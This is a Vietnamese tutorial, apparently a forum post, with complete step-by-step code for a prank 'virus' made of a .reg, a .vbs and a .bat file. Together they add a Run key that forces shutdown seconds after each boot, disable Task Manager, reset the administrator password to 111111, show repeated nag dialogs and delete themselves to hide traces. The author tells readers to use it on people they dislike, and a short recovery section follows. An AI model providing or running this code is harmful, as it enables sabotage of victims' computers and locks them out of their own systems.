Xem mẫu

  1. thấy các pác có vẻ thích vrius , hôm nay em xin viết 1 con virus tổng hợp : vài điều lưu ý : virus này gồm nhiều phần nên hơi khó : MỞ NOTEPAD lên , gõ copy đoạn lệnh sau vào : Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run] "Shutdown"="Shutdown.exe -s -f -t 05" [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System] "DisableTaskMgr"=dword:1 lưu lại với tên thu.reg ... mở tiếp notepad copy lệnh sau vào : Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!") Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat
  2. now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!! virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!") lưu lại với tên att.vbs tiếp tục mở notepad copy đoạn mã sau vào : title Programs cls net user administrator 111111 cls attrib -r -h -s *.* cls regedit /s thu.reg cls att.vbs cls del thu.reg del att.vbs del mylove.bat cls lưu lại với tên là mylove.bat copy 3 file này vào trong 1 folder chọn hidden cho att.vbs và thu.reg còn mylove.bat để nguyên thế là xong , chỉ cần victim mở folder ra click vào mylove.bat khi đó nó tự thay đổi registry , từ lần sau khởi động lại máy là chỉ sau 05 giây là máy lại shutdown , cứ kđ đc 5 giây lại tắt . bạn có thể thay đổi tg tắt máy trong thu.reg : "Shutdown"="Shutdown.exe -s -f -t 05" thay 05 = 10 hay 60 hay 120 hay chỉ là 01 ...tùy bạn . lúc này có muốn vào admin cũng không được vì đã bị đặt password là :111111 rồi . con mylove.bat này chạy xong tự động xóa chính mình không để lại giấu vết. LƯU Ý !!! CHỈ CHO AI MÌNH GHÉT CHỨ CHỚ NGHỊCH LUNG TUNG !!!
  3. thực chất không cần att.vbs cũng đc nhưng có thì càng hay ... BẠN CÓ THỂ THỬ NGHIỆM TRÊM MÁY MÌNH . "VIRUS GIA.RAR" CÁI "VIRUS GIA.RAR" trên mặc định tg là 300 giây = 5 phút , đủ để giải cứu, cách giải cứu : khi chạy cái "VIRUS GIA.RAR" rồi reset lại máy thì máy sẽ tự đông shutdown sau 5 phút . trong 5 phút này chạy file "CUUVIRUS.RAR" , autoshutdown sẽ bị vô hiệu hóa , tiếp tục bạn vào run gõ regedit - ok tìm khóa : HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run xóa file tên Shutdown đi là xong. tìm tiếp :HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System mở file DisableTaskMgr sửa giá trị thành 0. còn admin bị khóa thì vào bằng paSS: 111111 rồi remove pass đi . nếu tg quá ngắn như 01 hay 02 giây thì có cách khác ở dưới í . chúc thành công
nguon tai.lieu . vn